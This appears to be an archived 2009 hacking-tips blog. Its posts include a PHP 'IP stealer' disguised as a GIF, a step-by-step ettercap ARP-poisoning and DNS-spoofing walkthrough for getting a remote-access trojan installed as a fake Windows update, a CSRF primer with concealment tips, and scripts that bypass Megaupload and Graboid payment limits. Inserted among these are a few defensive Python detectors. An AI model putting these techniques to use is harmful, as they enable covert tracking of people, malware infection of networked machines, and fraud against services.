New Megaupload Trick

Friday, October 30, 2009

With no premium account?

Just do this with your links;

If the download link is say:

http://www.megaupload.com/?d=85GT7Z2W

Just add mgr_dl.php after the .com/ so the new link becomes:

http://www.megaupload.com/mgr_dl.php?d=85GT7Z2W

No captcha, No countdown, Full speed.

Get anyone's IP address

Thursday, October 15, 2009

Okay, this is a very simple tutorial, but I see a lot of requests 'WELL HOW DO I GET THURR IP ADDRESS'. Well, it's very simple. Here's what you're going to need:

  • A web host that supports PHP. A good free one is freehostia.com
  • .htaccess
  • shakira.gif
  • A real pic of shakira (or any image you'd like)
  • ips.txt

Alright, so in a folder create an ips.txt, .htaccess file, gather an image and open up your image editor to a blank tab, and let's begin! First off, here's what the code is going to look like for our IP stealer!
<?php
$myImage = imagecreatefromjpeg('shakira.jpg');
header("Content-type: image/jpg");
imagejpeg($myImage);
imagedestroy($myImage);


    if (!empty($_SERVER['HTTP_CLIENT_IP']))
    {
      $v_ip=$_SERVER['HTTP_CLIENT_IP'];
    }
    elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
    {
      $v_ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else
    {
      $v_ip=$_SERVER['REMOTE_ADDR'];
    }

$v_date = date("l d F H:i:s");

$fp = fopen("ips.txt", "a");
fwrite($fp, "IP: \t$v_ip - DATE: \t$v_date\n\n");
fclose($fp);
?>


First off, towards the top make sure that you change 'shakira.jpg' to the name of your image, or it will not work!

Okay, so what it's doing is at the top, it's basically grabbing the real image shakira.jpg and echoing it, and at the bottom is the IP stealer I've created. It's simple, and it's added a few extra measures in there so that even if they're behind a proxy, it'll still return THEIR IP. So, you paste all that in your editor, and save it as shakira.GIF. Yes, save it as a .gif file. The MIME types above that I used (jpeg) do NOT matter, as you'll see here. So, save it as shakira.gif.

Then, you can modify this part:
$fp = fopen("ips.txt", "a");
fwrite($fp, "IP: \t$v_ip - DATE: \t$v_date\n\n");
fclose($fp);


And, instead of using ips.txt, you can use HTML and make nice fancy tables and things. I like mine simple though: easier to copy and paste and do what I will with it.

In your .htaccess file, you're going to add the line:
AddHandler application/x-httpd-php .gif

This directive makes the server run files with the .gif extension through the PHP handler, so that the file isn't a .php file and looks inconspicuous.

So now, you're going to take the real image, shakira.gif, ips.txt and the .htaccess file and upload them all to your freehostia account. Now, you can link the image in a myspace and get IPs that way, or if you need a specific IP address you can tell a person to look at your pic and link them to it, etc. You get the picture, use your imagination!
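From the hosting side, the AddHandler line above is something an administrator can look for. The following is an added example (not part of the original post) that audits .htaccess content for directives routing static file extensions to PHP; it also covers AddType and SetHandler inside a Files/FilesMatch block, which goes beyond the single directive shown on the page. The function name, extension list and sample file are constructed for illustration.

```python
import re

# Extensions that normally hold static content and should never be run as PHP.
STATIC_EXTS = {"gif", "jpg", "jpeg", "png", "ico", "bmp", "svg", "txt", "css"}

ADD = re.compile(r"^\s*(AddHandler|AddType)\s+(\S+)\s+(.+)$", re.I)
SET = re.compile(r"^\s*SetHandler\s+(\S+)", re.I)
FILES_OPEN = re.compile(r"^\s*<Files(?:Match)?\s+(.+?)>\s*$", re.I)
FILES_CLOSE = re.compile(r"^\s*</Files(?:Match)?>", re.I)


def audit_htaccess(text):
    """Return [(line_no, reason)] for directives that send static files to PHP."""
    findings, scope = [], None  # scope: pattern of the enclosing <Files*> block
    for no, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        if (m := FILES_OPEN.match(line)):
            scope = m.group(1)
        elif FILES_CLOSE.match(line):
            scope = None
        elif (m := ADD.match(line)) and "php" in m.group(2).lower():
            exts = {e.lstrip(".").lower() for e in m.group(3).split()}
            bad = sorted(exts & STATIC_EXTS)
            if bad:
                findings.append((no, f"{m.group(1)} runs {bad} as PHP"))
        elif (m := SET.match(line)) and "php" in m.group(1).lower() and scope:
            bad = sorted(e for e in STATIC_EXTS
                         if re.search(rf"\b{e}\b", scope, re.I))
            if bad:
                findings.append((no, f"SetHandler in {scope} runs {bad} as PHP"))
    return findings


# Constructed sample; line 3 is the directive from the post.
SAMPLE = r"""# constructed sample .htaccess
Options -Indexes
AddHandler application/x-httpd-php .gif
<FilesMatch "\.(png|jpg)$">
    SetHandler application/x-httpd-php
</FilesMatch>
AddHandler application/x-httpd-php .php
"""

if __name__ == "__main__":
    for line_no, reason in audit_htaccess(SAMPLE):
        print(f"line {line_no}: {reason}")
```
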

Get your Rat onto a pc that's on the same Network.

Wednesday, October 14, 2009

This is how to get someone to download your rat if you're on the same network.

This isn't supposed to be some amazing tutorial. I just want to have this so I don't have to keep answering the same damn question over and over again.

Start by downloading backtrack 4 and burning the iso.
http://www.remote-exploit.org/backtrack_download.html

Boot into backtrack and open the file browser, and browse to /var/www/. There will be a file called index.html.


Now copy your rat into the same directory and name it windowsupdate.exe

Start apache
/etc/init.d/apache2 start

Open Firefox and navigate to 127.0.0.1. Your fake update page should show up.
Now set up the dns_spoofing configuration:

echo "* A 192.168.1.101" >> /usr/share/ettercap/etter.dns

Replace 192.168.1.101 with your own ip (ifconfig)
Use nmap to find your target ip


nmap -sP your_subnet/24

Now arp-poison with ettercap using the dns_spoof plugin.

ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.102/ -P dns_spoof

Replace 192.168.1.102 with your target's ip.
Replace 192.168.1.1 with your gateway ip.
Replace wlan0 with your interface.

If you want to target everyone on the network you can use the following command.

ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ // -P dns_spoof

Now every time they try to navigate to a web page, they will be redirected to your update page.
Some people will be suspicious but after 5 min of not being able to browse, anyone will give in.

Once you get remote access stop ettercap right away and run the following command in the target computer's cmd.

ipconfig /flushdns

This will let them browse again
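What the ARP poisoning described above looks like in a host's neighbour table, as an added example (not part of the original post): while it runs, the gateway's IP resolves to the same MAC as another host on the LAN, and differs from the MAC recorded earlier. The sketch parses `ip neigh` output; the function names, baseline MAC and sample rows are constructed, with addresses following the post's 192.168.1.x layout.

```python
import re
from collections import defaultdict

# One `ip neigh` row: "<ip> dev <if> lladdr <mac> <state>"; FAILED rows have no lladdr.
NEIGH = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+\S+\s+lladdr\s+"
    r"(?P<mac>[0-9a-f]{2}(?::[0-9a-f]{2}){5})\b", re.I)


def parse_neigh(text):
    """Map IPv4 address -> MAC for every resolved neighbour entry."""
    table = {}
    for line in text.splitlines():
        m = NEIGH.match(line.strip())
        if m:
            table[m["ip"]] = m["mac"].lower()
    return table


def arp_alerts(neigh_text, gateway_ip, baseline_gateway_mac=None):
    """Return (kind, mac, ips) tuples for ARP-cache states typical of poisoning."""
    table = parse_neigh(neigh_text)
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    alerts = []
    for mac, ips in by_mac.items():
        if len(ips) > 1:  # can be benign (proxy ARP, multi-homed host): triage it
            kind = "gateway-shared-mac" if gateway_ip in ips else "shared-mac"
            alerts.append((kind, mac, sorted(ips)))
    gw_mac = table.get(gateway_ip)
    if baseline_gateway_mac and gw_mac and gw_mac != baseline_gateway_mac.lower():
        alerts.append(("gateway-mac-changed", gw_mac, [gateway_ip]))
    return alerts


# Constructed samples; the MAC addresses are made up.
BASELINE_GW_MAC = "02:00:00:00:00:fe"
CLEAN = """192.168.1.1 dev wlan0 lladdr 02:00:00:00:00:fe REACHABLE
192.168.1.101 dev wlan0 lladdr 02:00:00:00:01:01 STALE
192.168.1.50 dev wlan0 FAILED"""
POISONED = """192.168.1.1 dev wlan0 lladdr 02:00:00:00:01:01 REACHABLE
192.168.1.101 dev wlan0 lladdr 02:00:00:00:01:01 STALE
192.168.1.50 dev wlan0 FAILED"""

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN), ("poisoned", POISONED)):
        print(name, arp_alerts(sample, "192.168.1.1", BASELINE_GW_MAC))
```
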

Basics of Cross Site Request Forgery

** Well first, what is CSRF?

CSRF stands for Cross Site Request Forgery. It is also abbreviated as XSRF, and Sea Surf and Session Riding are also names for it.

&& Many people think that CSRF is the same as XSS; this is completely untrue. As you read through this you will learn why.
&& Although XSS vulns are not necessary for CSRF, they will make it easier in most cases.

-- In CSRF, the victim sends the attacker's request to the web server without knowing about it.
 


** So how do I use it?

Here would be a simple way to log the user out of the website.


The reason for the height and width being "1" is so that the victim won't notice an image that didn't load.

This can also be done using iframes or automatic redirects (like a meta refresh), but this will alert the victim.


** A little more about the vulnerability:

Everything a user can do, CSRF can do, unless it is specifically protected against, mainly by using tokens.
The user must be logged in to the website.
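The token protection mentioned above, as an added example (not part of the original post): state-changing routes such as logout accept only POST and require a token derived from the session, which a third-party page cannot read or compute. The route names, `SERVER_KEY` handling and function names are hypothetical; a real application would use its framework's CSRF middleware.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)  # assumed per-deployment secret, kept server-side
STATE_CHANGING = {"/logout", "/settings/filter"}  # hypothetical routes


def issue_token(session_id: str) -> str:
    """Token bound to one session; embedded in the site's own forms."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def token_ok(session_id: str, submitted) -> bool:
    """Constant-time check that the submitted token belongs to this session."""
    if not isinstance(submitted, str):
        return False
    return hmac.compare_digest(issue_token(session_id).encode(), submitted.encode())


def handle(method: str, path: str, session_id: str, form: dict) -> int:
    """Return an HTTP status for a request from an already logged-in browser."""
    if path not in STATE_CHANGING:
        return 200
    if method != "POST":
        return 405  # <img> tags and meta refreshes issue GET, so they stop here
    if not token_ok(session_id, form.get("csrf_token")):
        return 403  # the cookie was sent automatically, the token was not
    return 200


if __name__ == "__main__":
    sid = "sess-constructed-1"  # constructed session identifier
    print(handle("GET", "/logout", sid, {}))                               # 405
    print(handle("POST", "/logout", sid, {}))                              # 403
    print(handle("POST", "/logout", sid, {"csrf_token": issue_token(sid)}))  # 200
```
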

** Who has been vulnerable to this in the past?

Gmail: attackers could make filters so that when a user received an email containing "password", it would be forwarded and deleted.
Myspace
Facebook
Twitter
The list goes on; a lot of websites still don't protect against it.

** Tips

Use hex coding, it won't be as suspicious, the victim will think it's just random characters.

Getting Free Movies Non Stop through Graboid

Saturday, October 10, 2009

As some of you may have heard, Graboid offers free movies, TV shows and more to download. It is subscription based on bandwidth. First,

Then after you open the program you will have the option to create an account.


Create it and log in. You will notice your bandwidth restriction, and your account will expire in a month, when you have to buy a subscription.


For when your account has expired, I have discovered a new way to make accounts (NOTE: After your account is created, you will never be able to create a free account again, neither through the program nor the website).

Make this batch script:
cd %appdata%
del MozillaControl /F /q
cd "%LOCALAPPDATA%\Graboid_Inc\"
del *.* /F /q


Run the batch file, and behold, the new account button shall appear again. Enter a different email address than the previous one, and you're good to go.

Hope this helped!